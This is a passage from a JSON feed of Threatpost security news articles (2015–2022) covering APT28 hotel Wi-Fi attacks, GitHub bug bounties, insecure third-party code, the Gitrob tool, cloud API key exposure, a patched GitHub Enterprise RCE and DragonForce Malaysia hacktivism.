FireEye does cite a 2016 hotel attack by APT28 with a similar modus operandi. In that incident, a hotel guest\u2019s username and password were stolen while they used the Wi-Fi network. Within 12 hours the victim\u2019s business network was compromised by someone using their credentials.\n\nOnce the foothold is established in the hotel\u2019s wi-fi system, hackers deployed the Responder tool in order to facilitate NetBIOS Name Service (NBT-NS) poisoning. \u201cThis technique listens for NBT-NS (UDP/137) broadcasts from victim computers attempting to connect to network resources. Once received, Responder masquerades as the sought-out resource and causes the victim computer to send the username and hashed password to the attacker-controlled machine,\u201d researchers said.\n\nThat username and hashed password from hotel guests is cracked offline and later used to escalate privileges in the victim\u2019s network, according to FireEye.\n\nIn all, hotels in seven European countries and one Middle Eastern country were targeted. \u201cBusiness and government personnel who are traveling, especially in a foreign country, often rely on systems to conduct business other than those at their home office, and may be unfamiliar with threats posed while abroad,\u201d researchers wrote.\n\nAPT28, or Sofacy, is the group implicated by a December [DHS report](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) related to U.S. election hacks. In a report [released earlier this week](<https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/>), Kaspersky Lab said the group has adopted new macro techniques and continued to find new targets such as the French political party.\n\n\u201cThese incidents show a novel infection vector being used by APT28. The group is leveraging less secure hotel Wi-Fi networks to steal credentials and a NetBIOS Name Service poisoning utility to escalate privileges,\u201d FireEye wrote. \u201cPublicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible.\u201d\n", "cvss3": {}, "published": "2017-08-12T08:00:32", "type": "threatpost", "title": "APT28 Using EternalBlue to Attack Hotels in Europe, Middle East", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-08-12T11:12:17", "id": "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "href": "https://threatpost.com/apt28-using-eternalblue-to-attack-hotels-in-europe-middle-east/127419/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Almost a year to the day since [Github announced its bug bounty program](<http://threatpost.com/github-launches-bug-bounty-program/103974>), the Git repository said yesterday that it will double its maximum payout to $10,000.\n\nBen Toews, a GitHub staffer, said yesterday that since the launch of the GitHub Security Bug Bounty, 73 previously unknown vulnerabilities have been patched.\n\n\u201cOf 1,920 submissions in the past year, 869 warranted further review, helping us to identify and fix vulnerabilities fitting nine of the OWASP top 10 vulnerability classifications,\u201d Toews said in a post to the GitHub blog. He added that GitHub has paid out $50,100 in bounties to 33 different researchers reporting 57 medium- to high-risk security issues.\n\n\u201cWe saw some incredibly involved and creative vulnerabilities reported,\u201d Toews said.\n\nGitHub pays bounties for verifiable bugs in the GitHub API, GitHub Gist, and the GitHub.com website. Until yesterday, rewards ranged from $100 to $5,000 in each [open bounty](<https://bounty.github.com/index.html#open-bounties>). The API, for example, exposes a lot of the website\u2019s functionality and data so it was a priority. The Gist is a GitHub code-sharing product built on Ruby on Rails and other open source components; bounties here vary depending on certain factors, GitHub said. As for the website, bounties there too depend on different factors and risks.\n\nBug bounties are an efficient and economical way for under-resourced organizations to expose applications to researchers who can help identify and fix potentially critical security vulnerabilities. Larger organizations such as [Facebook have prominent in-house bounties](<http://threatpost.com/facebook-bug-bounty-submissions-dramatically-increase/105235>). Facebook\u2019s, for example, paid out $1.5 million in 2013 with submissions growing almost 250 percent year over year.\n\nOthers are taking advantage of [bug bounty platforms offered by providers](<http://threatpost.com/crowdsourcing-finding-its-security-sweet-spot/106848>) such as BugCrowd and HackerOne. In these cases, providers essentially crowdsource vulnerability discovery and management. A self-contained community hammers away at applications on these respective platforms and earn bounties for bugs that meet certain criteria.\n\n> Git Hub will double its maximum bug bounty payout to $10,000\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fgithub-doubles-down-on-maximum-bug-bounty-payouts%2F110730%2F&text=Git+Hub+will+double+its+maximum+bug+bounty+payout+to+%2410%2C000>)\n\nGitHub\u2019s Toews pointed out one of GitHub\u2019s top bug submitters, Aleksandr Dobkin, who found a troubling cross-site scripting flaw that when combined with a zero day in Google\u2019s Chrome browser achieved a bypass of GitHub\u2019s content security policy.\n\nGitHub maintains a [leaderboard](<https://bounty.github.com/index.html>) of its top bug hunters. The system requires that researchers who find vulnerabilities in a GitHub property not disclose it before a patch has been released and implemented. Researchers are also not allowed to use automated scanners against GitHub, or access another user\u2019s account as part of the program.\n\nToews said vulnerabilities can be submitted [here](<https://bounty.github.com/submit-a-vulnerability.html>), and should also be accompanied by proper documentation that will allow GitHub to reproduce the vulnerability.\n", "cvss3": {}, "published": "2015-01-29T11:21:40", "type": "threatpost", "title": "GitHub Doubles Maximum Bug Bounty Payouts", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-30T20:11:49", "id": "THREATPOST:812C0E3D711FC77AF4348016C7A094D2", "href": "https://threatpost.com/github-doubles-down-on-maximum-bug-bounty-payouts/110730/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:19", "description": "The amount of insecure software tied to reused third-party libraries and lingering in applications long after patches have been deployed is staggering. It\u2019s a habitual problem perpetuated by developers failing to vet third-party code for vulnerabilities, and some repositories taking a hands-off approach with the code they host.\n\nThis scenario allows attackers to target one overlooked component flaw used in millions of applications instead of focusing on a single application security vulnerability. The real-world consequences have been demonstrated in the past few years with the [Heartbleed](<https://threatpost.com/openssl-fixes-tls-vulnerability/105300/>) vulnerability in OpenSSL, [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) in GNU Bash, and a deserialization vulnerability exploited in a recent high-profile attack against the [San Francisco Municipal Transportation Agency](<https://threatpost.com/hackers-make-new-claim-in-san-francisco-transit-ransomware-attack/122138/>). These are three instances where developers reuse libraries and frameworks that contain unpatched flaws in production applications.\n\nSecurity researchers at Veracode estimate that 97 percent of Java applications it tested included at least one component with at least one known software vulnerability. \u201cThe problem isn\u2019t limited to Java and isn\u2019t just tied to obscure projects,\u201d said Tim Jarrett senior director of security, Veracode. \u201cPick your programming language.\u201d Gartner, meanwhile, estimates that by 2020, [99 percent of vulnerabilities](<http://www.gartner.com/smarterwithgartner/top-10-security-predictions-2016/>) exploited will be ones known by security and IT professionals for at least one year.\n\n**Code Reuse Saves Time, Invites Bugs**\n\nAccording to security experts, the problem is two-fold. On one hand, developers use reliable code that at a later date is found to have a vulnerability. Second, insecure code is used by a developer who doesn\u2019t exercise due diligence on the software libraries used in their project.\n\n\u201cThey\u2019ve heard the warnings and know the dangers, but for many developers open source and third-party components can be a double-edge sword \u2013 saving time but opening the door to bugs,\u201d said Derek Weeks, vice president and DevOps advocate at Sonatype.\n\n[![sonatype](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232110/sonatype-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232110/sonatype.png>)In an analysis of 25,000 applications, Sonatype found that seven percent of components had at least one security defect tied to the use of an insecure software component.\n\nRepositories GitHub, Bitbucket, Python Package Index and NuGet Gallery are essential tools helping developers find pre-existing code that adds functionality for their software projects without having to reinvent the wheel. Java application developers, for example, rely on pre-existing frameworks to handle encryption, visual elements and libraries for handling data.\n\n\u201cSoftware is no longer written from scratch,\u201d Weeks said. \u201cNo matter how new and unique the application, 80 percent of the code used in a software application relies on third-party libraries or components.\u201d\n\nHe said enterprises are more reliant on the software supply chain than ever before. But he says many of the go-to open-source repositories that make up that supply chain are not vetted libraries of reliable code. Rather, they are warehouses with a varying percentage of outdated projects with security issues.\n\nAccording to an analysis of Sonatype\u2019s own Central Repository in 2015, developers had made 31 billion download requests of open source and third-party software components, compared to 17 billion requests the year before. And when Sonatype analyzed its own code library, it found 6.1 percent of code downloaded from its Central Repository had a known security defect.\n\nWeeks says Sonatype\u2019s is doing better than other repositories that offer no tools, no guidance and no red flags to prevent developers from using frameworks with faulty code. \u201cThere is no Good Housekeeping Seal of Approval for third-party code.\u201d\n\n\u201cFaulty code can easily spawn more problems down the road for developers,\u201d said Stephen Breen, a principal consultant at NTT Com Security. \u201cEven when development teams have the best intentions, it\u2019s easy for developers working under tight deadlines to not properly vet the third-party code used in their software.\u201d\n\nBreen said when insecure code is unknowingly used to build a component within a software program, problems snowball when that component is used inside other larger components. One example of vulnerable third-party code reused repeatedly is a deserialization flaw in Apache Commons Collections (commons-collections-3.2.1.jar) \u2013 first reported in 2015 and patched in November of the same year.\n\n[![threatpost_veracode_top_java_vulns](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232053/Threatpost_Veracode_Top_Java_vulns-1024x656.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232053/Threatpost_Veracode_Top_Java_vulns.png>)\n\nSource: Veracode\n\nJarrett found there are still 1,300 instances of the old vulnerable version of the Commons Collections lurking inside Java applications using Spring and Hibernate libraries and hosted across multiple open source code repositories.\n\n\u201cThe developer knows they are picking Spring or Hibernate for their development project. They don\u2019t take it to the next level and realize they are also getting Common Collections,\u201d Jarrett said. \u201cThat Common Collections library is then used by thousands more projects.\u201d\n\n[![apache](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232108/apache-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232108/apache.png>)According to Veracode, Apache Commons Collections is the sixth-most common component used in Java applications. It found that the unpatched versions of the software was in 25 percent of 300,000 Java applications scanned. Even more challenging for developers is updating those applications that are using the vulnerable version of libraries and frameworks since flaws were patched.\n\n\u201cThink of it like a faulty airbag. Carmakers used those faulty airbags in millions of vehicles. Now it\u2019s the carmaker on the hook to fix the problem, not the airbag maker,\u201d Jarrett said.\n\n**Leaky Apps, Bad Crypto, Injection Flaws Galore**\n\nVeracode said the Apache Common Collection example is the tip of the iceberg. When Veracode examined vulnerabilities tied to insecure code it found application information leakage, where user or application data can be leveraged by an attacker, is the most prevalent type of vulnerability, accounting for 72 percent of third-party code flaws. Second are cryptographic issues representing 65 percent of vulnerabilities. That was followed by Carriage Return Line Feed (CRLF) injection flaws and cross site scripting bugs.\n\n[![threatpost_veracode_top_vuln_cats](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232057/Threatpost_Veracode_Top_vuln_cats-1024x400.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232057/Threatpost_Veracode_Top_vuln_cats.png>)\n\nSource: Veracode\n\nCompounding the problem is an increased dependency on open-source components used in a wide variety of software products. The federal government is typical. It has an open-source-first policy as do many private companies. Relying on third-party libraries shortens development time and can improve the safety and quality of their software projects, Weeks said.\n\n\u201cNot only does code reuse save time but it also allows developers to be more innovative as they focus on creating new functionality and not writing encryption libraries from scratch,\u201d Weeks said. Done correctly, code reuse is a developer\u2019s godsend, he said.\n\nFor those reasons, security experts say it\u2019s time for the industry to stop and consider where code originates. Sonatype, which markets and sells code verification services, promotes the idea of documenting software\u2019s supply chain with what it calls a \u201csoftware bill of materials.\u201d That way developers can better scrutinize open-source frameworks before and after they are used; making it easier to update those applications that are using vulnerable old versions of libraries.\n\nSonatype said it found one in 16 components it analyzed had a vulnerability that was previously documented, verified and with additional information available on the Internet. \u201cI can\u2019t imagine any other industry where it\u2019s okay that one in 16 parts have known defects.\u201d\n\nThe problem is that among developers there is a mix of denial and ignorance at play. \u201cDevelopers choose component parts, not security,\u201d Weeks said. It should be the other way around.\n\n\u201cIf we are aware of malicious or bad libraries or code, of course we want to warn our users,\u201d said Logan Abbott, president of SourceForge, a software and code repository. \u201cWe scan binaries for vulnerabilities, but we don\u2019t police any of the code we host.\u201d\n\n**Repositories Say: \u2018We\u2019re Just the Host\u2019**\n\nRepositories contacted by Threatpost say their platforms are a resource for developers akin to cloud storage services that allow people to store and share content publicly or privately. They don\u2019t tell users what they can and cannot host with their service.\n\nThey say rooting out bugs in software should be on shoulders of developers \u2013 not repositories. Writing good vulnerability-free code starts at getting good code from healthy repositories with engaged users.\n\n[![bitbucket](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232105/bitbucket-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232105/bitbucket.png>)\u201cBitbucket is to a developer like Home Depot is to a carpenter,\u201d said Rahul Chhabria, product manager for Atlassian Bitbucket. \u201cWe\u2019ve built a hosting service with a variety of tools to help developers execute on their vision.\u201d\n\nChhabria said Bitbucket offers a range of tools to help sniff out bad or insecure components such as the third-party tool SourceClear for scanning dependency chains. It also offers Bitbucket that it says allows for team development of software projects and simplifies peer review. Another features, Bitbucket Pipelines, is also designed to help developers ship high quality code.\n\nGitHub is one of the largest repositories; it hosts 49 million public and private projects for its 18 million users. It does not scan or red flag insecure code hosted on its platform, according to Shawn Davenport, VP of security at GitHub. Instead developers can use third party-tools such as Gemnasium, Brakeman and Code Climate for static and dependency analysis.\n\n[![github](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232101/github-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232101/github.png>)\u201cThere is a lot of hidden risk out there in projects,\u201d Davenport said. \u201cWe do our best to make sure our developers know what tools are available to them to vet their own code.\u201d He estimates a minority GitHub developers take advantage of software scanning and auditing tools. \u201cUnfortunately security isn\u2019t a developers first priority.\u201d\n\nOther repositories told Threatpost they intentionally take a hands-off approach and say expecting them to police their own software isn\u2019t feasible, not part of their mission and nothing they plan to do. They point out, flawed or not, developers want access to all code \u2013 even older components.\n\n\u201cAn implementation of a library in one framework might not be a security risk at all,\u201d Breen said. He points out developers often temporarily revert to those old libraries as stopgaps should an updated version break a project.\n\n**Automated Scanning to the Rescue?**\n\nOne attempt at nipping the problem at the bud is the used of automated security vulnerability and configuration scanning for open source components. By 2019, more than 70 percent of enterprise DevOps initiatives will incorporate automated scanning, according to Gartner. Today only 10 percent of packages are scanned.\n\n[![nodejs](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232050/nodejs-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232050/nodejs.png>)The Node.js Foundation, an industry consortium designed to promote the Node.js platform, relies on a more community-based approach via the Node.js Security Project. The goal is to provide developers a process for discovering and disclosing security vulnerabilities found in the Node.js module ecosystem. According to Node.js the approach is a hybrid solution that consists of a database of vulnerabilities and a community communication channel for vetting and disclosing vulnerable code.\n\n\u201cIt\u2019s not a story about security professionals solving the problem, it\u2019s about how we empower development with the right information about the (software) parts they are consuming,\u201d Weeks said. \u201cIn this case, the heart of the solution lies with development, and therefore requires a new approach and different thinking.\u201d\n", "cvss3": {}, "published": "2016-12-15T10:00:39", "type": "threatpost", "title": "Code Reuse a Peril for Secure Software Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-12-27T13:45:57", "id": "THREATPOST:87897784F4B89A5B9E8CE18E2324CC70", "href": "https://threatpost.com/code-reuse-a-peril-for-secure-software-development/122476/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:34", "description": "Free online code repositories such as GitHub provide a valuable collaboration service for enterprise developers. But it\u2019s also a trove of potentially sensitive company and project information that\u2019s likely to warrant attention from hackers.\n\nAn application security specialist from Berlin has developed a tool he hopes can keep companies a step ahead. [Gitrob](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>) is an open source intelligence command-line tool that mines GitHub for files belonging to an organization and runs them against pre-determined patterns looking for potentially sensitive information that isn\u2019t meant for public consumption.\n\nIts developer Michael Henriksen, who does application security and code auditing for SoundCloud, says Gitrob starts off by using GitHub\u2019s public API to query a Github organization\u2019s list of public members.\n\n\u201cWhen the list of members is obtained, it queries GitHub again for each member that returns a list of their public repositories,\u201d Henriksen told Threatopst. \u201cThe contents of the repositories are never downloaded to the machine, it simply uses GitHub\u2019s API again to obtain a list of file names. When clicking on a file in the web interface to see its contents, it is fetched from GitHub\u2019s servers.\u201d\n\nHenriksen said he has built a number of Observers, which act as Gitrob plug-ins, that flag files matching certain patterns. Organization members, repositories and files are saved to a PostgreSQL database for analysis before a Sinatra webserver is started locally in order to serve a web app that presents the data for analysis, which must be conducted manually.\n\n\u201cAll the files are sent through these observers, one by one, and the observers can then decorate or make changes to the file\u2019s database record, before it is saved to the database,\u201d Henriksen said. \u201cRight now, Gitrob actually only contains one observer which will flag files that match [patterns of interesting files](<https://github.com/michenriksen/gitrob/blob/master/patterns.json>), but the design makes it easy to introduce new logic to look for other things. The patterns are built in to the tool itself.\u201d\n\nSecurity analysts inside an enterprise should feel at home using Gitrob, Henriksen said, but cautioned that the tool will point out a default set of potentially sensitive items. An analyst would have to manually comb through them to determine whether those files should be public.\n\n> OSINT #Gitrob mines GitHub for sensitive information that isn\u2019t meant for public consumption.\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fgitrob-combs-github-repositories-for-secret-company-data%2F110380%2F&text=OSINT+%23Gitrob+mines+GitHub+for+sensitive+information+that+isn%26%238217%3Bt+meant+for+public+consumption.>)\n\n\u201cA security team in an organization can use Gitrob to periodically scan their repositories for sensitive files that might be checked in,\u201d Henriksen said. \u201cThe current version is not really suitable to run in an automated fashion, so it would have to be run manually, but I am planning to change that in the future so that it can be run automatically and report to somewhere when new things are found.\u201d\n\nHenriksen said he tested Gitrob against a number of GitHub repositories belonging to companies of different sizes; he found a variety of information using Gitrob from username-password combinations, email addresses, internal system mappings and other information that could be used in phishing campaigns or other social engineering attacks. Henriksen said he notified affected organizations; most were appreciative he said.\n\n\u201cI am not aware of any tool that specifically targets GitHub organizations like Gitrob does,\u201d Henriksen said. \u201cPeople have been finding sensitive files with GitHub\u2019s search functionality for a while (kind of like Google dorks for Github), but I think Gitrob is the first tool that makes the task of finding sensitive files within an organization very easy.\u201d\n\nInstallation instructions and requirements can be found on [his Github page](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>).\n\n[_Image courtesy othree._](<https://www.flickr.com/photos/othree/>)\n", "cvss3": {}, "published": "2015-01-13T12:55:07", "type": "threatpost", "title": "Gitrob Combs Github Repositories for Secret Company Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-16T13:26:31", "id": "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "href": "https://threatpost.com/gitrob-combs-github-repositories-for-secret-company-data/110380/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:19", "description": "When it comes to cloud computing, APIs more or less drive everything, but in the eyes of some researchers, existing security controls around them haven\u2019t kept pace.\n\nWhile individual components of a system can be secure, when that system gets deployed in the cloud it can often become insecure \u2013 and get worse at scale, according to Erik Peterson, a cloud technology researcher with Veracode. Peterson, who also refers to himself as a Cloud Security Weapons Manufacturer, described the \u2018Emergent Insecurity\u2019 of the cloud in a talk Wednesday at the Source Conference in Boston.\n\nEarly on in his presentation, Peterson recounted a [Chris Hoff](<https://twitter.com/Beaker>) quote that he claims sums up the concept: \u201cIf your security sucks now, you\u2019ll be pleasantly surprised by the lack of change when you move to cloud.\u201d\n\nIn particular Peterson warned about the dangers associated with API credential exposure, something which could easily lead to apps being rigged to spread malware, cloud infrastructure adapted for use in a Bitcoin mining operation, additional attacks being launched, and the most critical: the downloading of sensitive customer data.\n\n\u201cAPI access is the new equivalent to physical access,\u201d Peterson said, \u201cIf someone compromises your most sensitive API credential, it doesn\u2019t matter.\u201d\n\nAPI keys, which protect cloud metadata \u2013 information that usually includes Amazon Web Services (AWS) access credentials, and startup scripts \u2013 can often be the only thing standing between users and total compromise, he stressed.\n\nPeterson, who\u2019s researched cloud and architect solutions in AWS since 2009, warned that old, vintage software vulnerabilities can easily be leveraged for compromise.\n\nHe\u2019s seen it all: Server-side request forgery vulnerabilities, XML external entity vulnerabilities, command injection vulnerabilities, unintended proxy or intermediary vulnerabilities. Each one can lead to the unintended exposure of metadata, but when they all come together, it can result in a full stack hack, or what Peterson likens to \u201cdeath by 1,000 cuts.\u201d\n\nFor instance, he claims, if an attacker gained access to an API key they could escalate privileges. If they gained access to cloud DNS, it could reveal the private IP of the web server. If an attacker got access to an IP address, they could uncover an app that hasn\u2019t been tested. Once in, it\u2019s possible an attacker could do the worst, Peterson claims, clone the database for quiet extraction.\n\n\u201cLots of people are shuffling cloud data and not thinking of the flaws,\u201d Peterson said, \u201cthey all lead to exposing that user data, all that great info my system needs to startup.\u201d\n\nThere are ways to prevent a full stack hack, mainly through encryption, but common sense doesn\u2019t hurt either.\n\n\u201cNo more checking your API keys into GitHub,\u201d Peterson advised.\n\nAttackers often scour the service looking to exploit vulnerabilities and access cloud metadata API. Storing sensitive information like API keys there can be a quick lesson in futility. That still doesn\u2019t stop users from doing it though; a cursory search on the service for \u201cSECRET_ACCESS_KEY\u201d last year yielded 7,500 placeholder results, Peterson said.\n\nOne developer discovered 140 servers running on his Amazon Web Services account [last year](<https://it.slashdot.org/story/15/01/02/2342228/bots-scanning-github-to-steal-amazon-ec2-keys>) after a bot scanning GitHub sniffed out his Amazon Elastic Compute Cloud (EC2) keys.\n\nDevelopers should get off the old EC2 classic and lockdown their Simple Storage Service (S3) buckets, Peterson said Wednesday. If they aren\u2019t already, developers should log everything, especially API activity, he said, adding that some AWS tools, like [Cloudtrail](<https://aws.amazon.com/cloudtrail/>), which records AWS API calls, and [Netflix\u2019s Security Monkey](<https://threatpost.com/netflix-open-source-security-tools-solve-range-of-challenges/107931/>), which can be used to monitor and analyze AWS configurations, can be invaluable.\n\nInstead of trying to control change, developers should react to change, rethink their threat model and realize that lower priority software vulnerabilities, like SSRF, or XXE, can still be deadly, Peterson said.\n\n\u201cIf you have a key that an app is using ask yourself: What\u2019s the worst thing that could happen if it was compromised?\u201d Peterson asked aloud, \u201cIs there a path that leads to my entire environment getting deleted by some unknown entity?\u201d\n", "cvss3": {}, "published": "2016-05-19T14:20:22", "type": "threatpost", "title": "Protecting Cloud APIs Critical to Mitigating Total Compromise", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-19T18:20:22", "id": "THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "href": "https://threatpost.com/protecting-cloud-apis-critical-to-mitigating-total-compromise/118197/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:56", "description": "GitHub recently awarded $18,000 to a researcher after he came across a bug in its GitHub Enterprise management console that could have resulted in remote code execution.\n\nThe company patched the vulnerability at the end of January, but news of the flaw didn\u2019t surface until this week when GitHub and Markus Fenske, a German independent pen-tester [disclosed it](<http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html>).\n\nGitHub Enterprise is an on-premises version of GitHub.com that can be used to deploy a GitHub service on their organization\u2019s local network. The vulnerability is a combination of two bugs, Fenske told Threatpost Thursday.\n\nOne problem stems from the fact that a static value was being used to cryptographically sign the Ruby on Rails session secret for the console. The secret value is supposed to be a randomly generated per-machine value used to sign the cookie, not a static value.\n\nGitHub acknowledged on Tuesday that the static secret was only supposed to be used for testing and development, but \u201can unrelated change of file permissions prevented the intended (and randomly generated) session secret from being used.\u201d\n\n\u201cFor testing purposes they replaced it with a static value and forgot to change it back,\u201d Fenske told Threatpost. In the production environment, there was a mechanism that should have replaced it with a random value. But it did not work.\u201d\n\nWhile GitHub shouldn\u2019t have been using a static secret to sign cookies that hold session data, the other problem, Fenske says, is that session data could be serialized with Marshal. [Marshal](<https://ruby-doc.org/core-2.2.2/Marshal.html>), a library that converts collections of Ruby objects into a byte stream, has a method, .load, that can return the result of converted serialized data.\n\nAs Fenske points out, [documentation](<https://ruby-doc.org/core-2.2.0/Marshal.html#method-c-load>) around Marshal.load says to \u201cnever pass untrusted data (including user supplied input) to this method,\u201d but that\u2019s what GitHub was doing.\n\nBy knowing the secret, an attacker could have forged a cookie, deserialized by Marshal.load, and tricked GitHub into running whatever code they wanted.\n\n\u201cBecause the secret is known, you can create a valid signature and pass arbitrary data to Marshal.load, which then leads to remote code execution,\u201d Fenske said.\n\nFenske says that while he sells sugar wax for hair removal by day\u2013[seriously](<https://www.bodypil.de/ueber-uns.html>)\u2013he hacks stuff by night. He founded an IT security consulting firm, Exablue, last month which he plans to use to carry out audits, pen-testing, and \u201cthe whole range\u201d going forward. He said he was inspired to poke around GitHub Enterprise after he stumbled upon a blogpost by Taiwanese hacker Orange Tsai about [a SQL injection](<http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html>) he found in the platform.\n\n\u201cAbout two minutes after decoding the source and opening the first file (config.ru) of the first application (the management interface), I noticed the vulnerability,\u201d Fenske said.\n\nGitHub fixed the vulnerability on Jan. 31 when it pushed out GitHub Enterprise 2.8.7. Now the service defaults to a randomly generated session secret if the initially configured session secret is not found.\n\nIt was a fairly quick turnaround for the company; the patch came only five days after Fenske reported the issue and earned him $10,000, the highest reward the company gives out through its bug bounty program, and [a spot in its Hall of Fame](<https://bounty.github.com/researchers/iblue.html>).\n\n\u200b\u201dWorking with GitHub is really nice,\u201d Fenske said, \u201cFor a company that big, their speed is amazing.\u201d\n\nThe researcher had no idea when he submitted the bug, however, that the company was in the middle of a promotional bug bounty period. The company [announced the promotion](<https://github.com/blog/2302-bug-bounty-anniversary-promotion-bigger-bounties-in-january-and-february>), which stretched from January to February, to celebrate the third anniversary of its [bug bounty program](<https://bounty.github.com/#rules>) with HackerOne.\n\nAfter he sent a draft of his disclosure to the company this week, Fenske discovered his bug was severe enough to fetch an additional $8,000 bounty and [second place in the contest](<https://github.com/blog/2332-bug-bounty-third-anniversary-wrap-up>).\n\n\u201cI was just writing my article and sent GitHub a draft to look at, and the answer came within minutes, telling me that I can publish whatever I like and that they gave me more money,\u201dhe said, \u201cI did not know about that extra contest and was very pleasantly surprised.\u201d\n\nFenske\u2019s bug was one of three GitHub fixed in its Enterprise product to qualify for additional bug bounty money. The company also fixed two separate SAML authentication bypass bugs in the service.\n\nFenske said the latest release of GitHub Enterprise uses a secret that\u2019s 16 random bytes written in hex.\n\n\u201cI quickly calculated that cracking it will take about 469142742208 gigayears on a 8-GPU instance (for comparison: The Sun will be gone in 7.7 gigayears). I think it\u2019s secure now.\u201d\n", "cvss3": {}, "published": "2017-03-17T09:00:04", "type": "threatpost", "title": "GitHub Code Execution Bug Fetches $18,000 Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-03-16T23:38:35", "id": "THREATPOST:E984089A4842B564B374B807AF915A44", "href": "https://threatpost.com/github-code-execution-bug-fetches-18000-bounty/124378/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-15T15:52:57", "description": "According to a new [advisory](<https://www.radware.com/getattachment/bde65cb6-ace4-4dea-bce3-5f3b6cc1c951/Advisory-DragonForce-OpsPatuk-OpsIndia-final.pdf.aspx>) from Radware, a hacktivist group called DragonForce Malaysia, \u201cwith the assistance of several other threat groups, has begun indiscriminately scanning, defacing and launching denial-of-service attacks against numerous websites in India.\u201d In addition to DDoS, their targeted campaign \u2013 dubbed \u201cOpsPatuk\u201d \u2013 involves advanced threat actors \u201cleveraging current exploits, breaching networks and leaking data.\u201d\n\nDragonForce Malaysia \u2013 best known for their hacktivism in support of the Palestinian cause \u2013 have turned their attention on India this time, in response to a controversial comment made by a Hindu political spokesperson about the Prophet Mohammed.\n\nAccording to the advisory, OpsPatuk remains ongoing today.\n\n## The Casus Belli\n\nIn a televised debate last month, Nupur Sharma \u2013 a spokesperson for the Hindu nationalist Bharatiya Janata Party (BJP) \u2013 made controversial remarks regarding the age of the Prophet Mohammed\u2019s third wife, Aisha. Widespread outrage followed, involving statements from leaders in the Muslim world, widespread protests, and the outsting of Sharma herself from BJP.\n\nThen, beginning on June 10, DragonForce Malaysia entered the fray. Their new offensive against the government of India was first enshrined in a [tweet](<https://twitter.com/DragonForceIO/status/1535273727755096064?ref_src=twsrc%5Etfw>):\n\n_Greetings The Government of India. __We Are DragonForce Malaysia. __This is a special operation on the insult of our Prophet Muhammad S.A.W. __India Government website hacked by DragonForce Malaysia. We will never remain silent. __Come Join This Operation ! __#OpsPatuk Engaged_\n\n![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/103/2022/06/15094527/DragonForceIO.png)\n\n(image from @DragonForceIO on Twitter)\n\nThe new advisory confirms that the group has used DDoS to perform \u201cnumerous defacements across India,\u201d pasting their logo and messaging to targeted websites.\n\nThe group also \u201cclaimed to have breached and leaked data from various government agencies, financial institutions, universities, service providers, and several other Indian databases.\u201d\n\nThe researchers also observed other hacktivists \u2013 \u2018Localhost\u2019, \u2018M4NGTX\u2019, \u20181887\u2019, and \u2018RzkyO\u2019 \u2013 joining the party, \u201cdefacing multiple websites across India in the name of their religion.\u201d\n\n## Who are DragonForce Malaysia?\n\nDragonForce Malaysia is a hacktivist group in the vein of Anonymous. They\u2019re connected by political goals, with a penchant for sensationalism. Their social media channels and website forums \u2013 used for everything \u201cranging from running an eSports team to launching cyberattacks\u201d \u2013 are visited by tens of thousands of users.\n\nIn the past, DragonForce have launched attacks against organizations and government entities across the Middle East and Asia. Their favorite target has been Israel, having launched multiple operations \u2013 #OpsBedil, #OpsBedilReloaded and #OpsRWM \u2013 against the nation and its citizens.\n\nAccording to the authors of the advisory, DragonForce are \u201cnot considered an advanced or a persistent threat group, nor are they currently considered to be sophisticated. But where they lack sophistication, they make up for it with their organizational skills and ability to quickly disseminate information to other members.\u201d Like Anonymous and the Low Orbit Ion Cannon, DragonForce weaponizes their own open source DoS tools \u2013 Slowloris, DDoSTool, DDoS-Ripper, Hammer, and more \u2013 in choreographed, flashy website defacements.\n\nSome members, \u201cover the last year, have demonstrated the ability and desire to evolve into a highly sophisticated threat group.\u201d Among other things, that\u2019s included leveraing publicly disclosed vulnerabilities. In 